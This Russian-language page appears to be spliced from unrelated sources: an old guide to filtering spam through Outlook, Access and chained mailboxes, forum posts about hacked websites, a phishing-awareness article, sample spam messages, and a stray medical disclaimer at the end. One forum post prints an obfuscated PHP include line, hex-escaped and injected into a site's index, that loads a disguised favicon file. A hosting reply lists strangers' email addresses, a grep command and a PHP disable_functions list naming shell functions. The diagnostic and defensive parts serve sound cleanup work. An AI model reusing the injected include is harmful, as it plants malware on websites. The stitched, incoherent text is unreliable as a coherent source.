Найти спамы с вирусом

Все большее распространение получают вирусы, рассылающие сами себя по десяткам адресов, а также случайным образом генерирующие адрес отправителя и тему письма. Не менее вредны и спаммеры, распространяющие свои письма всеми доступными методами, лишь бы охватить максимально широкий круг получателей.

Конечно, если вы получаете одно письмо в неделю, да еще пользуетесь какой-нибудь антивирусной программой, способной лечить Klez-h и прочую нечисть, то беспокоиться нечего. Но когда число приходящих писем переваливает за несколько десятков, то выбирать из них действительно нужные довольно утомительно, а вирусы, гнездящиеся в письмах, только того и ждут, чтобы вы щелкнули на послании и заглянули внутрь. И далеко не всякая антивирусная программа останавливает современный вирус, она, как правило, лишь сообщает о заражении. Опять же потеря времени на чистку дисков от заразы и удаление ненужных писем, а также финансовые затраты на лишнее время соединения становятся слишком большими.

Чтобы проанализировать огромное количество получаемого спама, понадобилось провести небольшое исследование, которое, кстати, можете сделать и вы сами. Сначала необходимо получить список нарушителей, но его не так-то просто достать из Outlook Express. Он находится в Реестре, и для Outlook Express после экспорта того раздела, где он размещается, список будет выглядеть примерно как в приведенном листинге.

Если вам не удастся сразу же найти нужный раздел, то поможет поиск в Реестре по значению параметра, в качестве которого нужно установить один из заблокированных адресов.

Двойной пунктир находится на месте больших изъятых участков файла, не прочитанного в Блокноте. Однако если открыть этот файл в Word 97/2000, то его можно привести к такому виду, в каком нетрудно будет проанализировать.

Те, кто знаком с текстовым процессором, смогут сделать это быстро, а наличие специализированных текстовых редакторов, позволяющих редактировать файл в двоичном представлении, дополнительно все ускорит. Итак, мы получили пронумерованный в шестнадцатеричном коде список заблокированных отправителей. Скопируем этот файл и произведем в копии еще одну замену: @ на ;.

Далее можно применить различные средства, я, например, использовал Access 97 из состава Office 97.

Если сохранить файлы в формате Text DOS и преобразовать их в таблицы MS Access, то получится, что сортировка первой таблицы не даст никакой информации, зато вторая позволит с помощью перекрестного запроса получить еще одну таблицу (рис. 1), где по частоте повторяемости будут расположены имена всех почтовых узлов, с которых приходила почта.

При заполнении условий фильтрации почты можно включить эти записи как составляющие неблагонадежных адресов, по которым они будут удалены.

Что необходимо сделать, чтобы письма отфильтровывались вне вашего компьютера? Во-первых, следует рассмотреть возможности применяемых почтовых ящиков, а если потребуется, то и завести новые.

Систему очистки писем от мусора можно организовать на базе следующего списка.

Это мой основной адрес, существующий уже давно, и именно сюда приходит много спама, к тому же на него я получаю еще и вирусы. Ящик имеет полезную функцию переадресации писем, необходимую для работы всей системы.

Дублирующий адрес, не используемый для регистрации где бы то ни было, применяется ограниченно, и мусора в нем обычно нет.

Бесплатный почтовый ящик с комбинированным доступом, как с Web-интерфейсом, так и с обычным по POP3 имеет функции автоответчика и переадресации.

Бесплатный почтовый ящик с Web-интерфейсом допускает устанавливать фильтры и задавать пересылку. Очень важно, что в нем дозволяется удалять письма с вирусами.

Можно обойтись и меньшим числом ящиков, но в данном варианте реализована подстраховка от потери важной информации.

Итак, письмо выслано на адрес Имя1@comail.ru. После попадания в этот почтовый ящик оно копируется, а копия направляется в архив Имя4@aport.ru, где можно найти ошибочно удаленные письма или просто избавиться от накопившихся за какое-то время сообщений и уже ненужных писем. Оригиналы переадресуются на Имя3@newmail.ru. Здесь письма фильтруются по адресам, и те, что считаются неблагонадежными, безвозвратно удаляются. Оставшиеся пересылаются на Имя5@narod.ru, где уничтожаются письма, зараженные вирусами. Отфильтрованная от спама и вирусов корреспонденция попадает наконец в Имя2@mtu-net.ru, откуда благополучно доставляется посредством почтовой программы.

Рис. 2

Если вы используете для приема почты MS Outlook из Office 2000 Professional, то можете организовать фильтрацию и у себя на локальной машине, причем она станет дополнением к уже описанной. Правда, для борьбы с вирусами придется держать включенным специальный модуль (монитор) антивирусной программы с последними обновлениями. Так что когда вы получаете подозрительные письма, то не открывайте их (окно предварительного просмотра также должно быть закрыто), а попытайтесь скопировать на Рабочий стол. Если письмо содержит вирус, то антивирусный монитор сообщит об этом или запретит доступ к файлу (в зависимости от настроек антивирусной программы). Но просмотр текста письма в варианте, описанном далее, не приведет к заражению, так как обычно вложение, содержащее вирус, не активизируется. Для фильтрации почты придется поработать с MS Access 2000. Некоторые пользователи боятся применять это приложение, поскольку оно кажется сложным и, кроме того, требуется знание Visual Basic, но в данном случае все делается достаточно просто.

Рис. 5

Естественно, приведенные в статье советы не помогут вам уменьшить трафик при получении почты, но безопасность и удобство работы с письмами у вас, несомненно, повысятся.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

В вопросах безопасности понимая у меня нет

1. Подскажите, как можно решить эту проблему? чтоб все было чисто.

2. Сам он предлагает обновить движок до последней версии, или хотя бы до 2.3. Как происходит обновление? Все модули нужно заново ставить под нужную версию, да еще и настраивать? на примере того же Simple например, кто нибудь обновлялся?
шаблон сайта тоже заново ставить или как это происходит?
Какие еще могут быть последствия при обновлении (переиндексация / баги) ?

3. Имеются ли вообще в новых версиях какие-либо улучшения в плане безопасности? или обновляться бесполезно? других поводов для обновления нет

вот такой код в индекс прописывают
/*a0869*/ @include "\x2fhom\x65/u5\x34469\x2fnik\x61-na\x67el.\x63om/\x77ww/\x2egit\x2fobj\x65cts\x2ffe/\x66avi\x63on_\x65ce1\x66b.i\x63o"; /*a0869*/ это инклюд favicon
в нем

Нужен тот кто сможет разобраться!
Хостинг прислал такую информацию:
C вашей услуги VDS-OVZ-Улёт
зафиксирована массовая рассылка почтовых сообщений. Мы подозреваем, что сервер рассылает спам, а это запрещено правилами предоставления наших услуг (https://firstvds.ru/company/documents/contract-vds-oferta, Приложение 1, раздел V).

Сейчас исходящий почтовый трафик сервера автоматически заблокирован.

ЭТО ЛЕГАЛЬНАЯ РАССЫЛКА?
Если это легальная рассылка, то мы разблокируем 25 порт и добавим IP адрес вашего сервера в “белый” список.

2. Ответом на данное сообщение, отправьте детали рассылки:

- Каким образом подписчики дают согласие на получение рассылки? (Согласно закону о рекламе, у вас должна быть информация о том, в какое время и с какого IP-адреса каждый пользователь дал подтверждение на рассылку. Иначе рассылка классифицируется как СПАМ)

- Пример письма, где есть возможность быстро отписаться от рассылки.

В случае обнаружения несоответствия полученных ответов действительности или при получении жалоб от Spamcop, Spamhaus и подобных сервисов разрешение на рассылку аннулируется.

ВЫ НЕ ДЕЛАЕТЕ НИКАКИХ РАССЫЛОК?
Если не вы инициировали эту рассылку, то ваш сервер взломан.

Я ИМ ОТВЕТИЛ ЧТО НИКАКОЙ РАССЫЛКИ НЕ ДЕЛАЛ.
ПОПРОСИЛ ПОМОЧЬ.
ОНИ ОТВЕТИЛИ:

В почтовой очереди более 32 тыс писем на отправку:
[root@umimart /]# exim -bpc
32489

Пример свежих из них:
0m 1.6K 1ebmSE-00009N-Gh

k.mahl@telia.com
0m 1.6K 1ebmSE-00009Q-Hn
thungstrom@gmail.com
0m 1.6K 1ebmSE-00009T-Ij
stephennie_91@hotmail.com
0m 1.6K 1ebmSE-00009W-JS

hanseungsoo@gmail.com
0m 1.6K 1ebmSE-00009Z-KA
emmanueltetteh@hotmail.com

Заблокировал следующие спам-скрипты:
/var/www/sergo/data/www/ehlektronik.ru/catalog/controller/event/oxhopcir.php
/var/www/sergo/data/www/applemen.ru/admin/view/template/tool/zjnilwsb.php

Однако все равно нужно провести чистку от вредоносных и спам-скриптов.
Следующая команда покажет рассылающие скрипты из почтовых заголовков:
grep -R 'X-PHP-Originating' /var/spool/exim/input/|awk ''|grep php|awk -F : ''|sort|uniq -c
Временно остановили почтовый сервер exim, примите меры и завершите чистку.
По окончании сообщите, пожалуйста.

P.s. Еще подозрительные файлы:
/var/www/sergo/data/www/applesweet.ru/xml.php
/var/www/sergo/data/www/applemen.ru/xml.php
/var/www/sergo/data/www/ehlektronik.ru/xml.php

Проверка нашими администраторами платная:
Стоимость проверки до 10 сайтов (на одном сервере, проверка части сайтов одного пользователя не производится) - 1000 рублей, свыше 10 сайтов - 1000 рублей/час.

, : и т.п.).
- Изолируете сайты друг от друга, для этого создавайте каждый сайт на отдельном пользователе.
- Настройте резервное копирование сайтов.
- В файле конфигурации PHP (php.ini) добавьте disable_functions неиспользуемые у вас на сайтах функции:
disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source

и такая проблема только с гугл поиском, на яндексе все норм, может кто знает где могут находится эти файлы и куски кода, или как исправить данную проблему.
Так же этот вирус генерит кучу новых страниц, через гугл веб мастер они удаляются после индексации, при повторной индексации вылазит снова куча левых страниц 404

Проверял домен на гугл вебмастер, а там:

Первая тысяча страниц с ошибками - неизвестные ссылки пришитые гуглом к моему домену. Какой то джумла.

Что это за херня, кто знает?

НА вирисы проверял - НЕТ
У хостинга спрашивал - НОРМ

Что это за абракадабра?

Ни одного зарегистрированного пользователя не просматривает данную страницу

Важная информация

Спам и фишинг — это две самые эффективные техники, которые помогают криминалистам получить их недобросовестные выгоды. По мере того как человечество становится все боле и более зависимо от технологий, особенно от интернета, мы замечаем как преступники объединяются в организационные кибер-группы, что упорно трудятся для осуществления злонамеренных проектов, которые будут приносить деньги от ничего не подозревающих жертв.

Некоторые эксперты считают, что дезорганизационная преступность уже перестала существовать. Когда многие склонны думать, что кибер криминалисты являются супер продвинутыми хакерами, которые знают как использовать код для вторжения через системы безопасности и даже получения отдаленного контроля над компьютерами пользователей, реальность немного другая.

В большинстве случаев, эти злодеи просто способные мошенники, которые используют методы социальной инженерии чтобы обмануть пользователей установить вредоносную программу на их компьютеры. Использование спама и фишинга для распространения вредоносного ПО является наилучшим доказательством этого, и фактически, может быть определено как логическая эволюция киберпреступности.Не надо тратить часы времени, создавая сложные схемы атаки, когда все что требуется для взлома – убедить пользователя открыть вложение электронной почты, которое выглядит как чье-то резюме.

Такие техники оказать очень эффективными и значительно ускорили распространение вредоносных программ. Например, 2017 год широко признан как год вымогателей, а факт что даже 93% фишинговых писем в первом квартале 2017 года содержали вымогателя, просто доказывает это. Ясно, что есть разумные основания полагать, что степень спама и фишинга в 2018 достигнет еще большего числа.

Примеры вредоносных писем

Письма содержащие вредоносные программы до сих пор являются самым эффективным вектором атаки. Спамеры широко используют текущие события (спортивные мероприятия, распродажи, налоговый сезон и т.д.) и рассылают сотни тысяч тематических сообщений, также некоторые трюки работают целый год.

Приведенные ниже примеры раскрывают фишинговые емейлы, которые обычно используются для распространения паразитов. Надеемся, эти примеры помогут вам идентифицировать фишинговые письма в будущем и заставят вас скептически относиться к надежности электронных сообщений, отправленных вам от незнакомых людей.

Пример 1: Письма с резюме или вакансией на роботу

Фишинговые сообщения, которые содержат вложенное резюме обычно отправляется специалистами, менеджерами или владельцами компании, кто делает решение о принятие на роботу. Такие сообщения обычно содержат только несколько строчек текста, приглашая получателя открыть прикрепленное резюме.

Как правило, мошенники ожидают, что эти фишинговые письма будут убедительными, пытаясь заразить определенную компанию или организацию здравоохранения. Такие письма в основном использовать в спам-кампаниях CryptoWall 3.0, GoldenEye, и Cerber. Смотрите некоторые примеры таких фишинговых писем ниже.

Как идентифицировать письмо зараженное вирусом?

Как идентифицировать письмо зараженное вирусом? ⇦ ⇨

Пример 2: Фишинговые письма утверждающие, что они принадлежат гиганту электронной коммерции Amazon

Кибер-преступники склонны обманывать пользователей Amazon фальшивыми электронным письмам, отправленными с фиктивных учетных записей электронной почты, которые с первого взгляда кажутся законными.

Такие фишинг-письма можно использовать для вытаскивания денег с жертвой или для доставки вложения к электронному письму, которое несет серьезный компьютерный вирус. Например, мошенники использовали auto—shipping@amazon.comадрес для рассылки тысяч писем, содержащих Locky вымогатель.

Пример 3: Квитанции

Еще один очень успешный метод, который помог увеличить распространение ремиксов Locky вымогателя, включал фишинговые письма, которые содержали вложение под названием “ATTN: Invoice-[случайный код]”. Эти обманчивые письма содержали несколько строк текста в поле сообщения, прося жертву “просмотреть прилагаемую квитанцию (Microsoft Word Document)”.

Единственная проблема заключается в том, что документ Word на самом деле содержит вредоносный скрипт, который активируется с помощью функции макроса. Ниже приведен пример описанного фишингового сообщения.

Пример 4: Спам, который использует тему крупных спортивных событий

Любите спорт? Тогда вы должны знать о спортивно-тематическом спаме. В последнее время исследователи Kaspersky заметили увеличение электронных сообщений, ориентированных на пользователей, заинтересованных в чемпионате Европы по футболу, предстоящих чемпионатах мира в 2018 и 2022 годах, а также на Олимпийских играх в Бразилии.

Такие сообщения содержат вредоносный ZIP-архив, содержащий троянскую программу (загрузочную угрозу) в виде JavaScript файла. По мнению экспертов, троянец настроен загрузить еще больше паразитов на компьютер. Смотрите пример вредоносного сообщения ниже.

Пример 5: Террористическо-тематический спам

Мошенники не забывают, что терроризм является одним из тех субъектов, который вызывает наибольший интерес. Неудивительно, что эта тема также используется во вредоносном спаме. Террористическо- тематический спам не является одним из любимчиков для мошенников; однако вы должны знать, чего ожидать.

Ниже приведен пример такого сообщения электронной почты. Как сообщается, такой тип спама обычно используется для кражи персональных данных, выполнения DDoS-атак и распространения вредоносного ПО.

Пример 6: Письмо предоставляющие “отчеты о безопасности”

Исследователи обнаружили еще одну кампанию, которая распространяла вредоносные документы Word через электронную почту. Оказывается, эти документы также содержат заражающие макросы, которые загружают и запускают CryptXXX вымогателя, как только жертва активирует требуемую функцию. Такие письма содержат такую тему: “Security Breach — отчет о безопасности #[случайный код]”.

Пример 7: Вредоносный спам предположительно отправленный легитимными компаниями

Чтобы убедить жертву открыть файл, прикрепленный к письму, мошенники притворяются кем-то, кем они не являются. Самый простой способ обмануть пользователя в открытии вредоносного приложения — создать обманную учетную запись электронной почты, которая почти идентична той, что принадлежит законной компании.

Используя такие фиктивные адреса электронной почты, мошенники атакуют пользователей с красиво составленными электронными письмами, которые несут вредоносную нагрузку в прикрепленном к ним файле. В приведенном ниже примере показано электронное письмо, отправленное мошенниками, которые притворялись, что работают в Europcar.

Приведенный ниже пример показывает, какие сообщения использовались при атаке на клиентов компании A1 Telekom. Эти фишинг-сообщения включали обманчивые URL-адреса DropBox, которые приводили к вредоносным ZIP или JS файлам. Дальнейший анализ показал, что эти файлы содержат Crypt0l0cker вирус.

Пример 8. Срочное задание от вашего боса

В последнее время мошенники начали использовать новый трюк, который помогает им получать деньги от ничего не подозревающих жертв за несколько минут. Представьте, что вы получили письмо от своего босса, говорящее, что он/она находится в отпуске, и вам необходимо срочно внести платеж в какую-либо компанию, потому что босс скоро будет недоступен.

К сожалению, если вы спешите подчиняться командам и не проверяете мелкие детали, прежде чем делать это, вы можете в конечном итоге перевести деньги компании преступнику или, что еще хуже, заразить всю компьютерную сеть вредоносными программами.

Другой трюк, который может убедить вас открыть такую вредоносную привязанность, притворяется вашим коллегой. Этот трюк может быть успешным, если вы работаете в крупной компании, и вы не знаете всех своих коллег. Ниже вы можете увидеть несколько примеров таких фишинговых писем.

Пример 9. Налогово-тематический фишинг

Мошенники охотно следуют разным национальным и региональным налоговым расписаниям и не упускают шанс инициировать кампании по рассылке с учетом налогов для распространения вредоносных программ. Они используют разнообразную тактику социальной инженерии, чтобы обмануть несчастных жертв на загрузку вредоносных файлов, которые приходят с этими обманчивыми виртуальными письмами.

Такие приложения в основном содержат банковские трояны (кейлогеры), которые после установки крадут личную информацию, такую как имя жертвы, фамилию, логины, информацию о кредитной карте и аналогичные данные.

Вредоносная программа может скрываться в вредоносном вложении электронной почты или ссылке, вставленной в сообщение. Ниже вы можете увидеть пример сообщения электронной почты, которое предоставляет фальшивую квитанцию для заполнения налогов, что на самом деле является троянским конем.

Мошенники также пытаются привлечь внимание пользователя и заставить его открыть вредоносное приложение, заявив, что против него ожидаются действия правоохранительных органов. В сообщении говорится, что что-то нужно сделать “с уважением, суд”, которое прилагается к сообщению.

Конечно, прикрепленный документ не является повесткой в суд — это вредоносный документ, который открывается в защищенном виде и просит жертву разрешить редактирование. Следовательно, вредоносный код в документе загружает вредоносное ПО на компьютер.

В последнем примере показано, как мошенники пытаются обмануть бухгалтеров в открытии вредоносных вложений. Похоже, что письмо приходит от кого-то, кто обращается за помощью к CPA и, конечно же, содержит вложение или два. Это просто типичные вредоносные Word документы, которые активируют скрипт и загружают вредоносное ПО с удаленного сервера, как только жертва их открывает.

Как идентифицировать вредоносные письма и держаться в безопасности?

Существует несколько основных принципов безопасности, при попытке избежать вредоносных писем.

Забудьте папку спам. Есть причина почему сообщения попадают в секцию Спам или Нежелательные. Это означает, что фильтры электронной почты автоматически идентифицируют, что одинаковые или похожие электронные письма отправляются тысячам людей или что огромное количество получателей уже отметили такие сообщения, как спам. Легитимные письма попадают в эту категорию только в очень редких случаях, так что лучше держать подальше от папки Спам и нежелательные.
Проверьте отправителя сообщения перед его открытием. Если вы не уверены в отправителе, не копайтесь в содержимом такого письма вообще. Даже если у вас есть антивирусная или антивредоносная программа, не нажимайте на ссылки, добавленные в сообщение, и не открывайте прикрепленные файлы, не задумываясь. Помните — даже лучшие программы безопасности могут не идентифицировать новый вирус, если вы оказались одной из первых целей, выбранных разработчиками. Если вы не уверены в отправителе, вы всегда можете позвонить в компанию, из которой предположительно отправитель, и спросить о полученном вами электронном письме.
Держите ваши программы безопасности обновленными. Важно не иметь старых программ в системе, потому что они, как правило, полны уязвимостей безопасности. Чтобы избежать таких рисков, включите автоматическое обновление программного обеспечения. Наконец, используйте хорошую антивирусную программу для защиты от вредоносных программ. Помните — только последняя версия программы безопасности может защитить ваш компьютер. Если вы используете старую версию, и если вы пытаетесь отложить установку ее обновлений, вы просто позволяете вредоносным программам быстро входить в ваш компьютер — без их идентификации и блокировки.
Узнайте безопасен лиURLне нажимая на него. Если полученное электронное письмо содержит подозрительный URL-адрес, наведите указатель мыши на него, чтобы проверить его правильность. Затем посмотрите на нижний левый угол вашего веб-браузера. Вы должны увидеть реальный URL-адрес, на который вы будете перенаправлены. Если он выглядит подозрительным или заканчивается на .exe, .js или .zip, не нажимайте на него!
Киберпреступники обычно имеют слабый уровень написания. Поэтому, они часто не могут оставить даже краткое сообщение без орфографических или синтаксических ошибок. Если вы заметили некоторые, держитесь подальше от вставленных в сообщение URL или прикрепленных файлов.
Не спешите! Если вы видите, что отправитель настойчиво говорит вам открыть вложение или ссылку, лучше подумайте дважды перед тем как сделать это. Прикрепленный файл скорее всего содержит вредоносную программу.

Спам не имеет языковых границ

Спам очень разнообразен

В большинстве случаев спам содержит рекламные предложения, относящиеся к сфере товаров и услуг.

При этом некоторые сегменты товарного рынка оказываются для спамеров более предпочтительными, чем другие. Это происходит по разным причинам. Например, предложения, связанные с компьютерными технологиями (дешевый софт, льготный хостинг и т.п.), скорее найдут потребительский отклик в среде пользователей электронной почты (все они, как минимум, имеют компьютеры — в личном пользовании или на работе), чем у других групп потребителей. Некоторые группы товаров, традиционно предлагаемых в спаме, — например, лекарства или сигареты — произведены или распространяются с нарушением правил торговли и законодательных актов (нет лицензий, не оплачены пошлины и т.п.). Поэтому распространение их через реальные торговые сети становится проблематичным.

В англоязычной традиции спам, авторы которого очевидным образом нарушают законодательство, имеет самостоятельное название — scam (в отличие от обычного спама — spam).

Лидирующие тематики и примеры спама

Лидирующие тематики спама:

К этой тематике относится реклама средств для повышения потенции (виагра и пр.), а также для улучшения физических возможностей при занятих сексом; предложения посетить порносайты, посмотреть/купить порнографические материалы (видео и пр.). Преобладающий язык таких спамерских сообщений — английский.

Subject: very cheap erection tool 🙂

Good day!

We would like to offer cheapest Viagra in the world!

You can get it at:

Liza Stokes

Subject: i think you’re gonna like watching me get off 🙂

Hi…im Brooke..and I just got a webcam…lets have a little chat.. while you watch me get dirty .. haha;-)

Это предложения сбросить лишний вес, улучшить состояние кожи, волос; приобрести правильную осанку, купить биологические добавки и т. п. Предложения приобрести лекарства online. Преобладающий язык таких спамерских сообщений — английский. Для русскоязычного спама этой тематики более характерна реклама конкретных медицинских центров или методик.

Subject: Lose up to 19% weight. A new weightloss is here.

Hello, I have a special offer for you…
WANT TO LOSE WEIGHT?
The most powerful weightloss is now available
without prescription. All natural Adipren720
100% Money Back Guarantee!
— Lose up to 19% Total Body Weight.
— Up to 300% more Weight Loss while dieting.
— Loss of 20-35% abdominal Fat.
— Reduction of 40-70% overall Fat under skin.
— Increase metabolic rate by 76.9% without Exercise.
— Burns calorized fat.
— Suppresses appetite for sugar.
— Boost your Confidence level and Self Esteem.
Get the facts about all-natural Adipren720:

Subject: Legal Low prices for Valium (Diazepam) (Caffeine FREE)

Rx Shopping Service Brings You our Newest Product:
Your personal shopping service that legally provides
Over the Counter (OTC) approved drugs from Canada and
around the world.
Order Valium (Diazepam) and it will be
guaranteed Delivery within 7 DAYS!
Do not miss out *Limited Quantity!
Visit Here:

Это предложения по страхованию, уменьшению кредитной задолженности, выгодным условиям займов и т. п. Преобладающий язык таких спамерских сообщений — английский. За последний год увеличилось количество и русскоязычного спама этой тематики.

Subject: Lenders Compete—You Win

Reduce your mortgage payments
Interest Rates are Going Up!
Give Your Family The Financial Freedom They Deserve
Refinance Today & SAVE
*Quick & EASY
*CONFIDENTIAL
*100’s Of Lenders
*100% FREE
*Get The Lowest Rate
Apply Today!
All credit will be accepted
To clear your name from our database please or use one of the optins below.
Thank You
Call 1-800-279-7310
Or please mail us at:
1700 E. Elliot Rd. STE3-C4
Tempe, AZ. 85283

Subject: get a degree from home, Mas#ters, Bachelors or PHD

Call to inquire about our degree programs.
Whether you are seeking a Bachelors, Masters, Ph.D. or MBA
We can provide you with the fully verifiable credentials to get your career BACK ON TRACK!
No testing or coursework required Call:
we are sorry if you did not want to receive this mail.
To be removed from our list please call

Основные тематики русскоязычного спама

Кроме спама, рекламирующего различные товары, в русскоязычном спаме преобладает спам следующих тематик:

Образование
Отдых и путешествия
Реклама спамерских услуг
Бухгалтерские и юридические услуги
Недвижимость

Необычные спамерские тематики

Subject:

голосуй за Глазьева, ЦБ продался США

Subject: Join the thousands who are now sp@m-free

FORGET SPAM BLOCKERS!
Get SMART Spam Control That Always Delivers The Email You Want!
Finally, we discovered the ultimate solution that is guaranteed to stop all spam
without losing any of your important email! This revolutionary advanced technology
also protects you 100% against ALL email-borne viruses — both known and unknown.
We didn’t believe it either until we actually tried it. So you be the judge and see for yourself.

Специалисты по борьбе со спамом традиционно понимают под спамом незапрошенные коммерческие рекламные рассылки, отвечающие требованиям массовости и анонимности. Но рядовые пользователи склонны расширять границы этого понятия, приравнивая к спаму все виды неинформативных и/или нежелательных сообщений — автоответы почтовых роботов, письма с вирусами и т.п., — тем более, что для проведения некоторых видов подобных рассылок (например, для рассылки вирусов), все чаще используется специализированное спамерское программное обеспечение. Неоднократно были зафиксированы вирусные атаки, в которых вирусы рассылались с использованием спамерских технологий.

Читайте также:

Пожалуйста, не занимайтесь самолечением!
При симпотмах заболевания - обратитесь к врачу.